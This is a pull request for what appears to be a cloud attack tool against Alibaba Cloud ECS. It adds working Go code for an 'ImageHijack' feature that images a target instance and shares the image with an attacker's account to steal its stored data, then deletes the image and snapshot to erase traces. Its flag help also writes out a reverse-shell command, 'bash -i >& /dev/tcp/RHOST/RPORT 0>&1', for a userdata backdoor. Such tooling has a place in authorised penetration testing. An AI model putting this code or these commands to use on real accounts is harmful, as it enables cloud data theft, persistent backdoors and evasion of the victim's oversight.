### PR TITLE
add function ImageHijack to aliyun

### DIFF
--- a/cmd/alibaba/ecs.go
+++ b/cmd/alibaba/ecs.go
@@ -27,6 +27,7 @@ var (
 	ecsLsSpecifiedInstanceID   string
 	ecsExecSpecifiedInstanceID string
 	userDataBackdoor           string
+	imageHijack				   string
 )
 
 func init() {
@@ -49,7 +50,8 @@ func init() {
 	ecsExecCmd.Flags().StringVar(&lport, "lport", "", "设置反弹 shell 的主机端口 (Set the port of the listening host)")
 	ecsExecCmd.Flags().BoolVarP(&batchCommand, "batchCommand", "b", false, "一键执行三要素，方便 HW (Batch execution of multiple commands used to prove permission acquisition)")
 	ecsExecCmd.Flags().BoolVarP(&userData, "userData", "u", false, "一键获取实例中的用户数据 (Get the user data on the instance)")
-	ecsExecCmd.Flags().StringVarP(&userDataBackdoor, "userDataBackdoor", "U", "", "参数中输入命令例如bash -i >& /dev/tcp/RHOST/RPORT 0>&1，放置userdata后门（Input the command such as bash -i >& /dev/tcp/RHOST/RPORT 0>&1, Place backdoor userdata on instance")
+	ecsExecCmd.Flags().StringVarP(&userDataBackdoor, "userDataBackdoor", "U", "", "参数中输入命令例如\"bash -i >& /dev/tcp/RHOST/RPORT 0>&1\"，放置userdata后门 (Input the command such as \"bash -i >& /dev/tcp/RHOST/RPORT 0>&1\", Place backdoor userdata on instance)")
+	ecsExecCmd.Flags().StringVarP(&imageHijack, "imageHijack", "I", "", "参数中输入额外的阿里云帐号ID，例如186xxxxxxxxx5480，劫持实例存储数据到目标阿里云帐号中 (Enter an additional Aliyun account ID, such as 186xxxxxxxxx5480, to hijack the ECS to store data in the target Aliyun account)")
 	ecsExecCmd.Flags().BoolVarP(&metaDataSTSToken, "metaDataSTSToken", "m", false, "一键获取实例元数据中的临时访问密钥 (Get the STS Token in the instance metadata)")
 	ecsExecCmd.Flags().IntVarP(&timeOut, "timeOut", "t", 60, "设置命令执行结果的等待时间 (Set the command execution result waiting time)")
 	ecsExecCmd.Flags().BoolVarP(&ecsExecAllRegions, "allRegions", "a", false, "使用所有区域，包括私有区域 (Use all regions, including private regions)")
@@ -83,11 +85,11 @@ var ecsExecCmd = &cobra.Command{
 		} else if lhost == "" && lport != "" {
 			log.Warnln("未指定反弹 shell 的主机 IP (The ip of the listening host is not set)")
 			cmd.Help()
-		} else if command == "" && batchCommand == false && userData == false && metaDataSTSToken == false && commandFile == "" && lhost == "" && lport == "" && userDataBackdoor == "" {
+		} else if command == "" && batchCommand == false && userData == false && metaDataSTSToken == false && commandFile == "" && lhost == "" && lport == "" && userDataBackdoor == "" && imageHijack == ""{
 			log.Warnf("还未指定要执行的命令 (The command to be executed has not been specified yet)\n")
 			cmd.Help()
 		} else {
-			aliecs2.ECSExec(command, commandFile, scriptType, ecsExecSpecifiedInstanceID, ecsExecRegion, batchCommand, userData, metaDataSTSToken, ecsFlushCache, lhost, lport, timeOut, ecsExecAllRegions, userDataBackdoor)
+			aliecs2.ECSExec(command, commandFile, scriptType, ecsExecSpecifiedInstanceID, ecsExecRegion, batchCommand, userData, metaDataSTSToken, ecsFlushCache, lhost, lport, timeOut, ecsExecAllRegions, userDataBackdoor, imageHijack)
 		}
 	},
 }

--- a/pkg/cloud/alibaba/aliecs/ecsexec.go
+++ b/pkg/cloud/alibaba/aliecs/ecsexec.go
@@ -98,7 +98,7 @@ func DescribeInvocationResults(region string, CommandId string, InvokeId string,
 	return output
 }
 
-func ECSExec(command string, commandFile string, scriptType string, specifiedInstanceID string, region string, batchCommand bool, userData bool, metaDataSTSToken bool, ecsFlushCache bool, lhost string, lport string, timeOut int, ecsExecAllRegions bool, userDataBackdoor string) {
+func ECSExec(command string, commandFile string, scriptType string, specifiedInstanceID string, region string, batchCommand bool, userData bool, metaDataSTSToken bool, ecsFlushCache bool, lhost string, lport string, timeOut int, ecsExecAllRegions bool, userDataBackdoor string, imageHijack string) {
 	var InstancesList []Instances
 	if ecsFlushCache == false {
 		data := cmdutil.ReadECSCache("alibaba")
@@ -198,8 +198,17 @@ func ECSExec(command string, commandFile string, scriptType string, specifiedIns
 		for _, i := range InstancesList {
 			specifiedInstanceID := i.InstanceId
 			if userDataBackdoor != "" {
-				UserDataBackdoor(i.RegionId, userDataBackdoor, specifiedInstanceID, timeOut, scriptType, i.OSType,)
-			} else if i.Status == "Running" {
+				UserDataBackdoor(i.RegionId, userDataBackdoor, specifiedInstanceID, timeOut, scriptType, i.OSType)
+			} else if imageHijack !="" {
+				var isSure string
+				prompt := &survey.Input{
+			        Message: "警告：使用该攻击手法，会在目标账户上新建一个快照和镜像，本程序在攻击成功后提供删除功能。\n但如果因为意外情况导致快照或镜像残留在目标，有可能导致目标阿里云账户造成不必要支出。\n如果你已明确并确认要使用此攻击手法，请键入Yes，键入其他单词将退出此功能 \n(Warning: Using this attack method, a snapshot and mirror will be created on the target account. This program provides deletion function after successful attack. However, if the snapshot or mirror remains on the target due to unexpected circumstances, unnecessary expenses may be caused to the target Ali Cloud account. If you have specified and confirmed that you want to use this attack, type Yes.Any other words will exit this feature)",
+			    }
+			    survey.AskOne(prompt, &isSure)
+			    if isSure == "Yes" {
+			    	ImageHijack(i.RegionId, imageHijack, specifiedInstanceID, timeOut)
+			    }
+			}else if i.Status == "Running" {
 				num = num + 1
 				InstanceName := i.InstanceName
 				region := i.RegionId
@@ -352,11 +361,11 @@ func getMetaDataSTSToken(region string, OSType string, scriptType string, specif
 	return commandResult
 }
 
-func UserDataBackdoor(region string, command string, specifiedInstanceID string, timeOut int, scriptType string, OSType string) string {
+func UserDataBackdoor(region string, command string, specifiedInstanceID string, timeOut int, scriptType string, OSType string) {
 	request := ecs.CreateModifyInstanceAttributeRequest()
 	request.Scheme = "https"
 	request.InstanceId = specifiedInstanceID
-	userdata ,_ := base64.StdEncoding.DecodeString("I2Nsb3VkLWNvbmZpZwpib290Y21kOgogIC0g")
+	userdata, _ := base64.StdEncoding.DecodeString("I2Nsb3VkLWNvbmZpZwpib290Y21kOgogIC0g")
 	userdataStr := string(userdata)
 	userdataStr = fmt.Sprintf("%s%s", userdataStr, command)
 	userdataStr = base64.StdEncoding.EncodeToString([]byte(userdataStr))
@@ -368,9 +377,93 @@ func UserDataBackdoor(region string, command string, specifiedInstanceID string,
 		fmt.Println("执行成功，正在查询userdata值 (The execution is successful, and the userdata value is being queried)")
 		commandResult := getUserData(region, OSType, scriptType, specifiedInstanceID, timeOut )
 		fmt.Println(commandResult)
-		fmt.Println("如需使后门立即生效，请重启目标服务器 （For the backdoor to take effect immediately, please restart the target instance")
+		fmt.Println("如需使后门立即生效，请重启目标服务器 (For the backdoor to take effect immediately, please restart the target instance)")
 	} else {
-		fmt.Println("写入失败，请确认是否有ModifyInstanceAttribute权限 （Failed to write, please confirm whether you have the ModifyInstanceAttribute permission）")
+		fmt.Println("写入失败，请确认是否有 ModifyInstanceAttribute 权限 (Failed to write, please confirm whether you have the ModifyInstanceAttribute permission)")
 	}
-	return ""
+}
+
+func ImageHijack(region string, aliyunAccount string, specifiedInstanceID string, timeOut int) {
+	createImageRequest := ecs.CreateCreateImageRequest()
+	createImageRequest.Scheme = "https"
+	createImageRequest.InstanceId = specifiedInstanceID
+	createImageRequest.QueryParams["Tag.1.value"] = "hack"
+	createImageRequest.QueryParams["Tag.1.Key"] = "hack"
+	createImageResponse, err := ECSClient(region).CreateImage(createImageRequest)
+	if err != nil {
+		fmt.Println("创建失败，请确认是否有 CreateImage 权限 (Creation failed, Please check whether you have the CreateImage permission)")
+		return
+	}
+
+	imageId := createImageResponse.ImageId
+	describeImagesRequest := ecs.CreateDescribeImagesRequest()
+	describeImagesRequest.Scheme = "https"
+	describeImagesRequest.ImageOwnerAlias = "self"
+	describeImagesRequest.QueryParams["waiter"] = "expr='Images.Image[0].Status' to=Available"
+	describeImagesRequest.QueryParams["output"] = "cols=ImageId,Tags.Tag[0].TagValue,Status rows=Images.Image[]"
+
+	fmt.Println("正在创建目标实例镜像，请耐心等待 (The target instance image is being created. Please wait...)")
+	for {
+		describeImagesResponse, _ := ECSClient(region).DescribeImages(describeImagesRequest)
+
+		if len(describeImagesResponse.Images.Image) > 0 && string(describeImagesResponse.Images.Image[0].Tags.Tag[0].TagValue) == "hack" {
+			fmt.Println("创建完成,正在劫持此镜像到指定阿里云账户中 (Creating complete, hijacking this image to the specified Aliyun account)")
+			break
+		}
+
+		time.Sleep(10 * time.Second)
+	}
+
+
+	modifyImageSharePermissionRequest := ecs.CreateModifyImageSharePermissionRequest()
+	modifyImageSharePermissionRequest.Scheme = "https"
+	modifyImageSharePermissionRequest.ImageId = imageId
+	modifyImageSharePermissionRequest.QueryParams["AddAccount.1"] = aliyunAccount
+	_, err = ECSClient(region).ModifyImageSharePermission(modifyImageSharePermissionRequest)
+	if err != nil {
+		fmt.Println("劫持失败，请确认是否有 ModifyImageSharePermission 权限 (Hijack failed, please confirm whether there are ModifyImageSharePermission permissions)")
+		return
+	}
+
+	fmt.Println("劫持成功，请查看对应阿里云帐号的共享镜像")
+
+	cleanImage := []string{"Yes", "No"}
+	var cleanImageChoose string
+    prompt := &survey.Select{
+        Message: "是否进行清理痕迹？注意，清理后共享镜像将会被立刻删除 (Are traces cleaned? Note that the shared image will be deleted immediately after clearing)",
+        Options: cleanImage,
+    }
+    survey.AskOne(prompt, &cleanImageChoose)
+    if cleanImageChoose == "Yes" {
+    	modifyImageSharePermissionRequest.QueryParams["RemoveAccount.1"] = aliyunAccount
+    	ECSClient(region).ModifyImageSharePermission(modifyImageSharePermissionRequest)
+
+    	deleteImageRequest := ecs.CreateDeleteImageRequest()
+		deleteImageRequest.ImageId = imageId
+		deleteImageRequest.QueryParams["Force"] = "true"	
+		_, err = ECSClient(region).DeleteImage(deleteImageRequest)
+		errutil.HandleErr(err)
+
+		describeSnapshotsRequest := ecs.CreateDescribeSnapshotsRequest()
+		describeSnapshotsRequest.InstanceId = specifiedInstanceID
+		describeSnapshotsRequest.SnapshotType = "user"
+		describeSnapshotsRequest.QueryParams["output"] = "cols=SnapshotName,SnapshotId,LastModifiedTime rows=Snapshots.Snapshot[]"
+		describeSnapshotsResponse, err := ECSClient(region).DescribeSnapshots(describeSnapshotsRequest)
+		errutil.HandleErr(err)
+
+		var lastModifiedTime time.Time
+		var snapShotId string
+		for _, snapshot := range describeSnapshotsResponse.Snapshots.Snapshot {
+	        snapshotTime, _ := time.Parse(time.RFC3339, snapshot.LastModifiedTime)
+	        if snapshotTime.After(lastModifiedTime) {
+	            lastModifiedTime = snapshotTime
+	            snapShotId = snapshot.SnapshotId
+	        }
+	    }
+
+		deleteSnapshotRequest := ecs.CreateDeleteSnapshotRequest()
+		deleteSnapshotRequest.SnapshotId = snapShotId
+		ECSClient(region).DeleteSnapshot(deleteSnapshotRequest)
+		fmt.Println("清理完成")
+    }
 }


### PR DESCRIPTION
新增ImageHijack功能，该功能通过对目标实例创建一个镜像并分享到其他阿里云帐号实现实例存储数据窃取，可用于任意ECS实例（包括已停止状态）。功能自带清理，方便立即销毁痕迹，也可避免因创建镜像和快照导致目标产生扣费。
(Added ImageHijack, which can be used for any ECS instance including the stopped state by creating an image of the target instance and sharing it with other Aliyun accounts. The function comes with its own cleaning, which is convenient for immediate destruction of traces, and can avoid the cost deduction caused by creating images and snapshots)